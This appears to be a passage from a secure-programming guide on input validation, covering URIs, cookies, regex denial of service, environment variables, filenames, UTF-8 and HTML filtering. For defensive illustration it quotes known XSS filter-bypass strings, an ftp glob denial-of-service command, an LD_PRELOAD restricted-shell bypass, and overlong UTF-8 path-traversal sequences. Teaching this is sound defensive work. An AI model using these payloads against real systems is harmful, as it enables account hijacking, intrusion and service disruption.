• Filenames should be checked; see Section 5.6 for more information on filenames.
• URIs (including URLs) should be checked for validity. If you are directly acting on a URI (i.e., you’re
implementing a web server or web-server-like program and the URL is a request for your data), make
sure the URI is valid, and be especially careful of URIs that try to “escape” the document root (the
area of the filesystem that the server is responding to). The most common ways to escape the
document root are via “..” or a symbolic link, so most servers check any “..” directories themselves
and ignore symbolic links unless specially directed. Also remember to decode any encoding first (via
URL encoding or UTF-8 encoding), or an encoded “..” could slip through. URIs aren’t supposed to
even include UTF-8 encoding, so the safest thing is to reject any URIs that include characters with
high bits set.
If you are implementing a system that uses the URI/URL as data, you’re not home-free at all; you
need to ensure that malicious users can’t insert URIs that will harm other users. See Section 5.13.4 for
more information about this.
• When accepting cookie values, make sure to check that the domain value for any cookie you’re using is
the expected one. Otherwise, a (possibly cracked) related site might be able to insert spoofed cookies.
Here’s an example from IETF RFC 2965 of how failing to do this check could cause a problem:
• User agent makes request to victim.cracker.edu, gets back cookie session_id="1234" and sets the
default domain victim.cracker.edu.
• User agent makes request to spoof.cracker.edu, gets back cookie session-id="1111", with
Domain=".cracker.edu".
• User agent makes request to victim.cracker.edu again, and passes:
Cookie: $Version="1"; session_id="1234",
$Version="1"; session_id="1111"; $Domain=".cracker.edu"
The server at victim.cracker.edu should detect that the second cookie was not one it originated by
noticing that the Domain attribute is not for itself and ignore it.
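As promised in the first item above, here is a small C sketch of whitelist validation: a string is accepted only if every character appears in an explicit list of legal characters. The function name, the particular character list, and the length cap are illustrative choices, not requirements:

  #include <stdbool.h>
  #include <string.h>

  /* Return true only if 's' is non-empty, not too long, and contains
     nothing outside the explicit whitelist of legal characters. */
  static bool is_valid_name(const char *s) {
      static const char legal[] =
          "abcdefghijklmnopqrstuvwxyz"
          "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
          "0123456789_-";
      size_t len = strlen(s);
      if (len == 0 || len > 64)
          return false;
      return strspn(s, legal) == len;   /* reject anything not whitelisted */
  }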
Unless you account for them, the legal character patterns must not include characters or character
sequences that have special meaning to either the program internals or the eventual output:
• A character sequence may have special meaning to the program’s internal storage format. For
example, if you store data (internally or externally) in delimited strings, make sure that the delimiters
are not permitted data values. A number of programs store data in comma (,) or colon (:) delimited text
files; inserting the delimiters in the input can be a problem unless the program accounts for it (i.e., by
preventing it or encoding it in some way). Other characters often causing these problems include
single and double quotes (used for surrounding strings) and the less-than sign "<" (used in SGML,
XML, and HTML to indicate a tag’s beginning; this is important if you store data in these formats).
Most data formats have an escape sequence to handle these cases; use it, or filter such data on input.
• A character sequence may have special meaning if sent back out to a user. A common example of this
is permitting HTML tags in data input that will later be posted to other readers (e.g., in a guestbook or
“reader comment” area). However, the problem is much more general. See Section 7.16 for a general
discussion on the topic, and see Section 5.13 for a specific discussion about filtering HTML.
These tests should usually be centralized in one place so that the validity tests can be easily examined for
correctness later.
Make sure that your validity test is actually correct; this is particularly a problem when checking input
that will be used by another program (such as a filename, email address, or URL). Often these tests have
subtle errors, producing the so-called “deputy problem” (where the checking program makes different
assumptions than the program that actually uses the data). If there’s a relevant standard, look at it, but
also search to see if the program has extensions that you need to know about.
While parsing user input, it’s a good idea to temporarily drop all privileges, or even create separate
processes (with the parser having permanently dropped privileges, and the other process performing
security checks against the parser requests). This is especially true if the parsing task is complex (e.g., if
you use a lex-like or yacc-like tool), or if the programming language doesn’t protect against buffer
overflows (e.g., C and C++). See Section 7.4 for more information on minimizing privileges.
When using data for security decisions (e.g., “let this user in”), be sure to use trustworthy channels. For
example, on a public Internet, don’t just use the machine IP address or port number as the sole way to
authenticate users, because in most environments this information can be set by the (potentially
malicious) user. See Section 7.12 for more information.
expression libraries are built-in or easily available in almost all languages (the POSIX specification even
requires one).
Fundamentally, many modern regex engines (including those in PCRE, perl, Java, etc.) use backtracking
to implement regexes. In these implementations, if there is more than one potential solution for a match,
it will first try one branch to find a match, and if that doesn’t match, it will repeatedly backtrack to
the last untried solution and try again until all options are exhausted. The problem is that an attacker may
be able to cause many backtracks. In general, you want to bound the number of backtracks that occur.
The primary risks are groups with repetition, particularly if they are inside more repetition or alternation
with overlapping patterns. The regex "^([a-zA-Z]+)*$" with data "aaa1" involves a large number of
backtracks; once the engine encounters the "1", many implementations will backtrack through all
possible combinations of "+" and "*" before it can determine there is no match.
Simply avoiding the use of regexes doesn’t reliably counter ReDoS attacks, because naively
implementing the regex processing causes exactly the same problem. There are, however, simple things
that can be done. First, avoid running regexes provided by an attacker (or limit the time they can run). If
you can, use a Thompson NFA-to-DFA implementation; these never backtrack and thus are immune to
the problem (though they can’t provide some useful functions like backreferences). Otherwise, review
regexes to prevent backtracking if you can. At any point, any given character should cause only one
branch to be taken in the regex (just imagine that the regex is code). For every repetition, you should be able
to uniquely determine if the code will repeat or not based on the single next input character. You should
especially examine any repetition in a repetition - if possible, eliminate them (these in particular cause a
combinatorial explosion). You can use regex fuzzers and static analysis tools to examine these. In
addition, you can limit the input data size before using a regex; this greatly limits the effects of exponential growth in time. You can find more information in [Crosby2003] and in OWASP’s "Regular Expression Denial of Service" article.
necessary environment variables to safe values. There really isn’t a better way if you make any calls to
subordinate programs; there’s no practical method of listing “all the dangerous values”. Even if you
reviewed the source code of every program you call directly or indirectly, someone may add new
undocumented environment variables after you write your code, and one of them may be exploitable.
The simple way to erase the environment in C/C++ is by setting the global variable environ to NULL.
The global variable environ is defined in <unistd.h>; C/C++ users will want to #include this header file.
You will need to manipulate this value before spawning threads, but that’s rarely a problem, since you
want to do these manipulations very early in the program’s execution (usually before threads are
spawned).
The global variable environ is defined in various standards; it’s not clear that the official
standards condone directly changing its value, but I’m unaware of any Unix-like system that has trouble
with doing this. I normally just modify the “environ” directly; manipulating such low-level components
is possibly non-portable, but it assures you that you get a clean (and safe) environment. In the rare case
where you need later access to the entire set of variables, you could save the “environ” variable’s value
somewhere, but this is rarely necessary; nearly all programs need only a few values, and the rest can be
dropped.
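A minimal C sketch of this approach (keeping a copy of the old pointer is optional, and only useful if you need the old values later):

  #include <unistd.h>

  extern char **environ;      /* declare it explicitly; not every <unistd.h> does */

  int main(void) {
      char **old = environ;   /* optional: keep a handle to the old values */
      environ = NULL;         /* from here on, the process has an empty environment */
      (void) old;
      /* ... re-add the few variables actually needed, then do the real work ... */
      return 0;
  }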
Another way to clear the environment is to use the undocumented clearenv() function. The function
clearenv() has an odd history; it was supposed to be defined in POSIX.1, but somehow never made it into
that standard. However, clearenv() is defined in POSIX.9 (the Fortran 77 bindings to POSIX), so there is
a quasi-official status for it. In Linux, clearenv() is defined in <stdlib.h>, but before using #include to
include it you must make sure that __USE_MISC is #defined. A somewhat more “official” way to cause __USE_MISC to be defined is to first #define either _SVID_SOURCE or _BSD_SOURCE, and then #include <features.h> - these are the official feature test macros.
One environment value you’ll almost certainly re-add is PATH, the list of directories to search for
programs; PATH should not include the current directory and should usually be something simple like
“/bin:/usr/bin”. Typically you’ll also set IFS (to its default of “ \t\n”, where space is the first character)
and TZ (timezone). Linux won’t die if you don’t supply either IFS or TZ, but some System V based
systems have problems if you don’t supply a TZ value, and it’s rumored that some shells need the IFS
value set. In Linux, see environ(5) for a list of common environment variables that you might want to set.
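Re-adding the handful of values you need is then straightforward with setenv(3). This is only a sketch: the PATH and IFS values follow the suggestions above, "UTC" is merely one possible TZ value, and error checking is omitted for brevity:

  #include <stdlib.h>

  extern char **environ;

  int main(void) {
      environ = NULL;                       /* start from an erased environment */
      setenv("PATH", "/bin:/usr/bin", 1);   /* no current directory in PATH */
      setenv("IFS", " \t\n", 1);            /* space, tab, newline - space first */
      setenv("TZ", "UTC", 1);               /* pick a timezone appropriate for you */
      /* ... now continue, or exec a subordinate program ... */
      return 0;
  }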
If you really need user-supplied values, check the values first (to ensure that the values match a pattern
for legal values and that they are within some reasonable maximum length). Ideally there would be some
standard trusted file in /etc with the information for “standard safe environment variable values”, but at
this time there’s no standard file defined for this purpose. For something similar, you might want to
examine the PAM module pam_env on those systems which have that module. If you allow users to set
an arbitrary environment variable, then you’ll let them subvert restricted shells (more on that below).
If you’re using a shell as your programming language, you can use the “/usr/bin/env” program with the
“-” option (which erases all environment variables of the program being run). Basically, you call
/usr/bin/env, give it the “-” option, follow that with the set of variables and their values you wish to set
(as name=value), and then follow that with the name of the program to run and its arguments. You
usually want to call the program using the full pathname (/usr/bin/env) and not just as “env”, in case a
user has created a dangerous PATH value. Note that GNU’s env also accepts the options "-i" and
"--ignore-environment" as synonyms (they also erase the environment of the program being started), but
these aren’t portable to other versions of env.
If you’re programming a setuid/setgid program in a language that doesn’t allow you to reset the
environment directly, one approach is to create a “wrapper” program. The wrapper sets the environment
to safe values, and then calls the other program. Beware: make sure the wrapper will actually
invoke the intended program; if it’s an interpreted program, make sure there’s no race condition possible
that would allow the interpreter to load a different program than the one that was granted the special
setuid/setgid privileges.
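A tiny C sketch of such a wrapper, which hands the real program a fixed, known-safe environment via execve(2); the target path and the environment values are placeholders for whatever your situation requires:

  #include <stdio.h>
  #include <unistd.h>

  int main(void) {
      char *const argv[] = { "realprog", NULL };
      char *const envp[] = {               /* the complete environment; nothing is inherited */
          "PATH=/bin:/usr/bin",
          "IFS= \t\n",
          "TZ=UTC",
          NULL
      };
      execve("/usr/local/bin/realprog", argv, envp);  /* full path, no PATH search */
      perror("execve");                    /* only reached if the exec failed */
      return 1;
  }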
Given the similarities with certain other security issues, I’m surprised this hasn’t been discussed earlier. If it
has, people simply haven’t paid it enough attention.
This problem is not necessarily ssh-specific, though most telnet daemons that support environment passing
should already be configured to remove dangerous variables due to a similar (and more serious) issue back in
’95 (ref: [1]). I will give ssh-based examples here.
Scenario one: Let’s say admin bob has a host that he wants to give people ftp access to. Bob doesn’t want
anyone to have the ability to actually _log into_ his system, so instead of giving users normal shells, or even no
shells, bob gives them all (say) /usr/sbin/nologin, a program he wrote himself in C to essentially log the attempt
to syslog and exit, effectively ending the user’s session. As far as most people are concerned, the user can’t do
much with this aside from, say, setting up an encrypted tunnel.
The thing is, bob’s system uses dynamic libraries (as most do), and /usr/sbin/nologin is dynamically linked (as
most such programs are). If a user can set his environment variables (e.g. by uploading a “.ssh/environment”
file) and put some arbitrary file on the system (e.g. “doevilstuff.so”), he can bypass any functionality of
/usr/sbin/nologin completely via LD_PRELOAD (or another member of the LD_* environment family).
The user can now gain a shell on the system (with his own privileges, of course, barring any “UseLogin” issues
(ref: [2])), and administrator bob, if he were aware of what just occurred, would be extremely unhappy.
Granted, there are all kinds of interesting ways to (more or less) do away with this problem. Bob could just grit
his teeth and give the ftp users a nonexistent shell, or he could statically compile nologin, assuming his
operating system comes with static libraries. Bob could also, humorously, make his nologin program setuid and
let the standard C library take care of the situation. Then, of course, there are also the ssh-specific access
controls such as AllowGroup and AllowUsers. These may appease the situation in this scenario, but it does not
correct the problem.
... Now, what happens if bob, instead of using /usr/sbin/nologin, wants to use (for example) some BBS-type
interface that he wrote up or downloaded? It can be a script written in perl or tcl or python, or it could be a
compiled program; doesn’t matter. Additionally, bob need not be running an ftp server on this host; instead,
perhaps bob uses nfs or veritas to mount user home directories from a fileserver on his network; this exact setup
is (unfortunately) employed by many bastion hosts, password management hosts and mail servers---to name a
few. Perhaps bob runs an ISP, and replaces the user’s shell when he doesn’t pay. With all of these possible (and
common) scenarios, bob’s going to have a somewhat more difficult time getting around the problem.
... Exploitation of the problem is simple. The circumvention code would be compiled into a dynamic library
and LD_PRELOAD=/path/to/evil.so should be placed into ~user/.ssh/environment (a similar environment
option may be appended to public keys in the authorized_keys file). If no dynamically loadable programs are
executed, this will have no effect.
ISPs and universities (along with similarly affected organizations) should compile their rejection (or otherwise
restricted) binaries statically (assuming your operating system comes with static libraries)...
Ideally, sshd (and all remote access programs that allow user-definable environments) should strip any
environment settings that libc ignores for setuid programs.
can be useful, but complex globs can take a great deal of computing time. For example, on some ftp
servers, performing a few of these requests can easily cause a denial-of-service of the entire machine:
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
Trying to allow globbing, yet limit globbing patterns, is probably futile. Instead, make sure that any such
programs run as a separate process and use process limits to limit the amount of CPU and other resources
they can consume. See Section 7.4.8 for more information on this approach, and see Section 3.6 for more
information on how to set these limits.
Unix-like systems generally forbid including the NIL character in a filename (since this marks the end of
the name) and the “/” character (since this is the directory separator). However, they often permit
anything else, which is a problem; it is easy to write programs that can be subverted by cleverly-created
filenames.
Filenames that can especially cause problems include:
• Filenames with leading dashes (-). If passed to other programs, this may cause the other programs to
misinterpret the name as option settings. Ideally, Unix-like systems shouldn’t allow these filenames;
they aren’t needed and create many unnecessary security problems. Unfortunately, currently
developers have to deal with them. Thus, whenever calling another program with a filename, insert
“--” before the filename parameters (to stop option processing, if the program supports this common
request) or modify the filename (e.g., insert “./” in front of the filename to keep the dash from being the lead character); a short C sketch of this appears after this list.
• Filenames with control characters. This especially includes newlines and carriage returns (which are
often confused as argument separators inside shell scripts, or can split log entries into multiple entries)
and the ESCAPE character (which can interfere with terminal emulators, causing them to perform
undesired actions outside the user’s control). Ideally, Unix-like systems shouldn’t allow these
filenames either; they aren’t needed and create many unnecessary security problems.
• Filenames with spaces; these can sometimes confuse a shell into treating the name as multiple arguments, with the
other arguments causing problems. Since other operating systems allow spaces in filenames (including
Windows and MacOS), for interoperability’s sake this will probably always be permitted. Please be
careful in dealing with them, e.g., in the shell use double-quotes around all filename parameters
whenever calling another program. You might want to forbid leading and trailing spaces at least; these
aren’t as visible as when they occur in other places, and can confuse human users.
• Invalid character encoding. For example, a program may believe that the filename is UTF-8 encoded,
but it may have an invalidly long UTF-8 encoding. See Section 5.11.2 for more information. I’d like to
see agreement on the character encoding used for filenames (e.g., UTF-8), and then have the operating
system enforce the encoding (so that only legal encodings are allowed), but that hasn’t happened at
this time.
• Any other characters special to internal data formats, such as “<”, “;”, quote characters, backslash,
and so on.
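As promised above, here is a small C sketch of the “./” trick for defanging leading dashes before a filename is passed along. The function name is my own, and the buffer handling is kept deliberately simple:

  #include <stdio.h>
  #include <string.h>

  /* Copy 'name' into 'out', prefixing "./" if it starts with '-', so a
     downstream program cannot mistake the filename for an option. */
  static int defang_filename(const char *name, char *out, size_t outsize) {
      const char *prefix = (name[0] == '-') ? "./" : "";
      if (snprintf(out, outsize, "%s%s", prefix, name) >= (int) outsize)
          return -1;            /* name too long for the buffer */
      return 0;
  }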
arbitrary data to a web application. In general, servers must perform all their own input checking (of
form data, cookies, and so on) because they cannot trust clients to do this securely. In short, clients are
generally not “trustworthy channels”. See Section 7.12 for more information on trustworthy channels.
A brief discussion on input validation for those using Microsoft’s Active Server Pages (ASP) is available
from Jerry Connolly at http://heap.nologin.net/aspsec.html
Format and the CEN Format (European Community Standard); you’d like to permit both. Typical values
include “C” (the C locale), “EN” (English), and “FR_fr” (French using the territory of France’s
conventions). Also, so many people use nonstandard names that programs have had to develop “alias”
systems to cope with nonstandard names (for GNU gettext, see /usr/share/locale/locale.alias, and for
X11, see /usr/lib/X11/locale/locale.alias; you might need "aliases" instead of "alias"); they should
usually be permitted as well. Libraries like gettext() have to accept all these variants and find an
appropriate value, where possible. One source of further information is FSF [1999]; another source is the
li18nux.org web site. A filter should not permit characters that aren’t needed, in particular “/” (which
might permit escaping out of the trusted directories) and “..” (which might permit going up one
directory). Other dangerous characters in NLSPATH include “%” (which indicates substitution) and “:”
(which is the directory separator); the documentation I have for other machines suggests that some
implementations may use them for other values, so it’s safest to prohibit them.
[A-Za-z][A-Za-z0-9_,+@\-\.=]*
I haven’t found any legitimate locale which doesn’t match this pattern, but this pattern does appear to
protect against locale attacks. Of course, there’s no guarantee that there are messages available in the
requested locale, but in such a case these routines will fall back to the default messages (usually in
English), which at least is not a security problem.
If you wish to be really picky, and only accept patterns that match li18nux’s locale pattern, you can use this
pattern instead:
^[A-Za-z]+(_[A-Za-z]+)?
(\.[A-Z]+(\-[A-Z0-9]+)*)?
(\@[A-Za-z0-9]+(\=[A-Za-z0-9\-]+)
(,[A-Za-z0-9]+(\=[A-Za-z0-9\-]+))*)?$
In both cases, these patterns use POSIX’s extended (“modern”) regular expression notation (see regex(3)
and regex(7) on Unix-like systems).
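If it helps, here is a short C sketch that applies the first (simpler) pattern above using the POSIX regex(3) interface. The function name is mine; I have added ^ and $ anchors so the whole value must match, and moved the dash to the end of the bracket expression so it is taken literally:

  #include <regex.h>
  #include <stdbool.h>

  /* Accept a locale value only if it entirely matches the simple pattern
     given above: a letter followed by letters, digits, and _ , + @ . = - */
  static bool locale_is_sane(const char *value) {
      static const char pattern[] = "^[A-Za-z][A-Za-z0-9_,+@.=-]*$";
      regex_t re;
      bool ok = false;
      if (regcomp(&re, pattern, REG_EXTENDED | REG_NOSUB) == 0) {
          ok = (regexec(&re, value, 0, NULL, 0) == 0);
          regfree(&re);
      }
      return ok;
  }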
Of course, languages cannot be supported without a standard way to represent their written symbols,
which brings us to the issue of character encoding.
• The classical US ASCII characters (0 to 0x7f) encode as themselves, so files and strings which contain
only 7-bit ASCII characters have the same encoding under both ASCII and UTF-8. This is fabulous
for backward compatibility with the many existing U.S. programs and data files.
• All UCS characters beyond 0x7f are encoded as a multibyte sequence consisting only of bytes in the
range 0x80 to 0xfd. This means that no ASCII byte can appear as part of another character. Many
other encodings permit characters such as an embedded NIL, causing programs to fail.
• It’s easy to convert between UTF-8 and a 2-byte or 4-byte fixed-width representations of characters
(these are called UCS-2 and UCS-4 respectively).
• The lexicographic sorting order of UCS-4 strings is preserved, and the Boyer-Moore fast search
algorithm can be used directly with UTF-8 data.
• All possible 2^31 UCS codes can be encoded using UTF-8.
• The first byte of a multibyte sequence which represents a single non-ASCII UCS character is always
in the range 0xc0 to 0xfd and indicates how long this multibyte sequence is. All further bytes in a
multibyte sequence are in the range 0x80 to 0xbf. This allows easy resynchronization; if a byte is
missing, it’s easy to skip forward to the “next” character, and it’s always easy to skip forward and back
to the “next” or “preceding” character.
In short, the UTF-8 transformation format is becoming a dominant method for exchanging international
text information because it can support all of the world’s languages, yet it is backward compatible with
U.S. ASCII files as well as having other nice properties. For many purposes I recommend its use,
particularly when storing data in a “text” file.
Implementers of UTF-8 need to consider the security aspects of how they handle illegal UTF-8 sequences. It is
conceivable that in some circumstances an attacker would be able to exploit an incautious UTF-8 parser by
sending it an octet sequence that is not permitted by the UTF-8 syntax.
A particularly subtle form of this attack could be carried out against a parser which performs security-critical
validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as
characters. For example, a parser might prohibit the NUL character when encoded as the single-octet sequence
00, but allow the illegal two-octet sequence C0 80 (illegal because it’s longer than necessary) and interpret it as
a NUL character (00). Another example might be a parser which prohibits the octet sequence 2F 2E 2E 2F
("/../"), yet permits the illegal octet sequence 2F C0 AE 2E 2F.
A longer discussion about this is available at Markus Kuhn’s UTF-8 and Unicode FAQ for Unix/Linux at
http://www.cl.cam.ac.uk/~mgk25/unicode.html.
should check that every character meets one of the patterns in the right-hand column. A “-” indicates a
range of legal values (inclusive). Of course, just because a sequence is a legal UTF-8 sequence doesn’t
mean that you should accept it (you still need to do all your other checking), but generally you should
check any UTF-8 data for UTF-8 legality before performing other checks.
UCS Code (Hex)    Binary UTF-8 Format                           Legal UTF-8 Values (Hex)
00-7F             0xxxxxxx                                      00-7F
80-7FF            110xxxxx 10xxxxxx                             C2-DF 80-BF
800-FFF           1110xxxx 10xxxxxx 10xxxxxx                    E0 A0-BF 80-BF
1000-CFFF         1110xxxx 10xxxxxx 10xxxxxx                    E1-EC 80-BF 80-BF
D000-D7FF         1110xxxx 10xxxxxx 10xxxxxx                    ED 80-9F 80-BF
E000-FFFF         1110xxxx 10xxxxxx 10xxxxxx                    EE-EF 80-BF 80-BF
10000-3FFFF       11110xxx 10xxxxxx 10xxxxxx 10xxxxxx           F0 90-BF 80-BF 80-BF
40000-FFFFF       11110xxx 10xxxxxx 10xxxxxx 10xxxxxx           F1-F3 80-BF 80-BF 80-BF
100000-10FFFF     11110xxx 10xxxxxx 10xxxxxx 10xxxxxx           F4 80-8F 80-BF 80-BF
As I noted earlier, there are two standards for character sets, ISO 10646 and Unicode, which have agreed
to synchronize their character assignments. The earlier definitions of UTF-8 in ISO/IEC 10646-1:2000
and the IETF RFC also supported five and six byte sequences to encode characters beyond U+10FFFF,
but such values can’t be used to support Unicode characters. IETF RFC 3629 modified the UTF-8
definition, and one of the changes was to specifically make any encodings beyond 4 bytes illegal (i.e.,
characters must be between U+0000 and U+10FFFF inclusively). Thus, the five and six byte UTF-8
encodings for characters beyond U+10FFFF aren’t legal any more, and you should normally reject them
(unless you have a special purpose for them).
This set of valid values is tricky to determine, and in fact earlier versions of this document got some
entries wrong (in some cases it permitted overlong characters). Language developers should include a
function in their libraries to check for valid UTF-8 values, just because it’s so hard to get right.
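In that spirit, here is one way such a check might look in C, directly encoding the table above (treat it as a sketch to adapt, not as a vetted library; the function name is my own):

  #include <stdbool.h>
  #include <stddef.h>

  /* Return true if buf[0..len-1] is entirely legal UTF-8 according to the
     table above (no overlong forms, no surrogates, nothing past U+10FFFF). */
  static bool utf8_is_legal(const unsigned char *buf, size_t len) {
      size_t i = 0;
      while (i < len) {
          unsigned char b = buf[i];
          size_t need;                          /* continuation bytes required */
          unsigned char lo = 0x80, hi = 0xBF;   /* usual range for the first continuation byte */

          if (b <= 0x7F)                    { i++; continue; }
          else if (b >= 0xC2 && b <= 0xDF)  need = 1;
          else if (b == 0xE0)               { need = 2; lo = 0xA0; }
          else if (b >= 0xE1 && b <= 0xEC)  need = 2;
          else if (b == 0xED)               { need = 2; hi = 0x9F; }   /* excludes surrogates */
          else if (b >= 0xEE && b <= 0xEF)  need = 2;
          else if (b == 0xF0)               { need = 3; lo = 0x90; }
          else if (b >= 0xF1 && b <= 0xF3)  need = 3;
          else if (b == 0xF4)               { need = 3; hi = 0x8F; }   /* stops at U+10FFFF */
          else return false;                /* 0x80-0xC1 and 0xF5-0xFF are never legal lead bytes */

          if (len - i - 1 < need) return false;        /* truncated sequence */
          if (buf[i+1] < lo || buf[i+1] > hi) return false;
          for (size_t k = 2; k <= need; k++)           /* remaining bytes: always 80-BF */
              if (buf[i+k] < 0x80 || buf[i+k] > 0xBF) return false;
          i += need + 1;
      }
      return true;
  }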
I should note that in some cases, you might want to cut some slack for (or use internally) the hexadecimal
sequence C0 80. This is an overlong sequence that, if permitted, can represent ASCII NUL (NIL). Since
C and C++ have trouble including a NIL character in an ordinary string, some people have taken to using
this sequence when they want to represent NIL as part of the data stream; Java even enshrines the
practice. Feel free to use C0 80 internally while processing data, but technically you really should
translate this back to 00 before saving the data. Depending on your needs, you might decide to be
“sloppy” and accept C0 80 as input in a UTF-8 data stream. If it doesn’t harm security, it’s probably a
good practice to accept this sequence since accepting it aids interoperability.
Handling this can be tricky. You might want to examine the C routines developed by Unicode to handle
conversions, available at ftp://ftp.unicode.org/Public/PROGRAMS/CVTUTF/ConvertUTF.c. It’s unclear
to me if these routines are open source software (the licenses don’t clearly say whether or not they can be
In XML, this is termed “well-formed” data. A few exceptions could be made if you’re accepting standard
HTML (e.g., supporting an implied </p> where not provided before a <p> would be fine), but trying to
accept HTML in its full generality (which can infer balancing closing tags in many cases) is not needed
for most applications. Indeed, if you’re trying to stick to XHTML (instead of HTML), then
well-formedness is a requirement. Also, HTML tags are case-insensitive; tags can be upper case, lower
case, or a mixture. However, if you intend to accept XHTML then you need to require all tags to be in
lower case (XML is case-sensitive; XHTML uses XML and requires the tags to be in lower case).
Here are a few random tips about doing this. Usually you should design whatever surrounds the HTML
text and the set of permitted tags so that the contributed text cannot be misinterpreted as text from the
“main” site (to prevent forgeries). Don’t accept any attributes unless you’ve checked the attribute type
and its value; there are many attributes that support things such as Javascript that can cause trouble for
your users. You’ll notice that in the above list I didn’t include any attributes at all, which is certainly the
safest course. You should probably give a warning message if an unsafe tag is used, but if that’s not
practical, encoding the critical characters (e.g., "<" becomes "&lt;") prevents data loss while
simultaneously keeping the users safe.
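If you take the encoding route, the transformation itself is small. This C sketch (the function name and the fixed set of four characters are my own choices here) rewrites the usual HTML-significant characters into entities, writing into a caller-supplied buffer:

  #include <string.h>

  /* Encode <, >, &, and " as HTML entities so untrusted text cannot be
     interpreted as markup. Returns 0 on success, -1 if 'out' is too small. */
  static int html_encode(const char *in, char *out, size_t outsize) {
      size_t used = 0;
      if (outsize == 0)
          return -1;
      for (; *in != '\0'; in++) {
          const char *rep;
          char one[2] = { *in, '\0' };
          switch (*in) {
              case '<':  rep = "&lt;";   break;
              case '>':  rep = "&gt;";   break;
              case '&':  rep = "&amp;";  break;
              case '"':  rep = "&quot;"; break;
              default:   rep = one;      break;
          }
          size_t rlen = strlen(rep);
          if (used + rlen + 1 > outsize) return -1;   /* leave room for the final NUL */
          memcpy(out + used, rep, rlen);
          used += rlen;
      }
      out[used] = '\0';
      return 0;
  }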
Be careful when expanding this set, and in general be restrictive of what you accept. If your patterns are
too generous, the browser may interpret the sequences differently than you expect, resulting in a
potential exploit. For example, FozZy posted on Bugtraq (1 April 2002) some sequences that permitted
exploitation in various web-based mail systems, which may give you an idea of the kinds of problems
you need to defend against. Here’s some exploit text that, at one time, could subvert user accounts in
Microsoft Hotmail:
<SCRIPT>
</COMMENT>
<!-- --> -->
<_a<script>
<<script> (Note: this was found by BugSan)
Andrew Clover posted to Bugtraq (on May 11, 2002) a list of various text that invokes Javascript yet
manages to bypass many filters. Here are his examples (which he says he cut and pasted from elsewhere);
some only apply to specific browsers (IE means Internet Explorer, N4 means Netscape version 4).
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
This is not a complete list, of course, but it at least is a sample of the kinds of attacks that you must
prevent by strictly limiting the tags and attributes you can allow from untrusted users.
Konstantin Riabitsev has posted some PHP code to filter HTML (GPL); I’ve not examined it closely, but
you might want to take a look.
scheme://authority[path][?query][#fragment]
A URI starts with a scheme name (such as “http”), the characters “://”, the authority (such as
“www.dwheeler.com”), a path (which looks like a directory or file name), a question mark followed by a
query, and a hash (“#”) followed by a fragment identifier. The square brackets surround optional portions
- e.g., many URIs don’t actually include the query or fragment. Some schemes may not permit some of
the data (e.g., paths, queries, or fragments), and many schemes have additional requirements unique to
them. Many schemes permit the “authority” field to identify optional usernames, passwords, and ports,
using this syntax for the “authority” section:
[username[:password]@]host[:portnumber]
The “host” can either be a name (“www.dwheeler.com”) or an IPv4 numeric address (127.0.0.1). A
“relative” URI references one object relative to the “current” one, and its syntax looks a lot like a
filename:
path[?query][#fragment]
There are a limited number of characters permitted in most of the URI, so to get around this problem,
other 8-bit characters may be “URL encoded” as %hh (where hh is the hexadecimal value of the 8-bit
character). For more detailed information on valid URIs, see IETF RFC 2396 and its related
specifications.
Now that we’ve looked at the syntax of URIs, let’s examine the risks of each part:
• Scheme: Many schemes are downright dangerous. Permitting someone to insert a “javascript” scheme
into your material would allow them to trivially mount denial-of-service attacks (e.g., by repeatedly
creating windows so the user’s machine freezes or becomes unusable). More seriously, they might be
able to exploit a known vulnerability in the javascript implementation. Some schemes can be a
nuisance, such as “mailto:” when a mailing is not expected, and some schemes may not be sufficiently
secure on the client machine. Thus, it’s necessary to limit the set of allowed schemes to just a few safe
schemes.
• Authority: Ideally, you should limit user links to “safe” sites, but this is difficult to do in practice.
However, you can certainly do something about usernames, passwords, and port numbers: you should
forbid them. Systems expecting usernames (especially with passwords!) are probably guarding more
important material; rarely is this needed in publicly-posted URIs, and someone could try to use this
functionality to convince users to expose information they have access to and/or use it to modify the
information. Such URIs permit semantic attacks; see Section 7.17 for more information. Usernames
without passwords are no less dangerous, since browsers typically prompt for and then cache the password. You should
not usually permit specification of ports, because different ports expect different protocols and the
resulting “protocol confusion” can produce an exploit. For example, on some systems it’s possible to
use the “gopher” scheme and specify the SMTP (email) port to cause a user to send email of the
attacker’s choosing. You might permit a few special cases (e.g., http ports 8008 and 8080), but on the
whole it’s not worth it. The host when specified by name actually has a fairly limited character set
(using the DNS standards). Technically, the standard doesn’t permit the underscore (“_”) character, but
Microsoft ignored this part of the standard and even requires the use of the underscore in some
circumstances, so you probably should allow it. Also, there’s been a great deal of work on supporting
international characters in DNS names, which is not further discussed here.
• Path: Permitting a path is usually okay, but unfortunately some applications use part of the path as
query data, creating an opening we’ll discuss next. Also, paths are allowed to contain phrases like “..”,
which can expose private data in a poorly-written web server; this is less a problem than it once was
and really should be fixed by the web server. Since it’s only the phrase “..” that’s special, it’s
reasonable to look at paths (and possibly query data) and forbid “../” in the content. However, if your
validator permits URL escapes, this can be difficult; now you need to prevent versions where some of
these characters are escaped, and may also have to deal with various “illegal” character encodings of
these characters as well.
• Query: Query formats (beginning with "?") can be a security risk because some query formats actually
cause actions to occur on the serving end. They shouldn’t, and your applications shouldn’t either; see
Section 5.14 for more information. However, we have to acknowledge that in reality this is a
serious problem. In addition, many web sites are actually “redirectors” - they take a parameter
specifying where the user should be redirected, and send back a command redirecting the user to the
new location. If an attacker references such sites and provides a more dangerous URI as the
redirection value, and the browser blithely obeys the redirection, this could be a problem. Again, the
user’s browser should be more careful, but not all user browsers are sufficiently cautious. Also, many
web applications have vulnerabilities that can be exploited with certain query values, but in general
this is hard to prevent. The official URI specifications don’t sanction the “+” (plus) character, but in
practice the “+” character often represents the space character.
• Fragment: Fragments basically locate a portion of a document; I’m unaware of an attack based on
fragments as long as the syntax is legal, but the legality of its syntax does need checking. Otherwise,
an attacker might be able to insert a character such as the double-quote (") and prematurely end the
URI (foiling any checking).
• URL escapes: URL escapes are useful because they can represent arbitrary 8-bit characters; they can
also be very dangerous for the same reasons. In particular, URL escapes can represent control
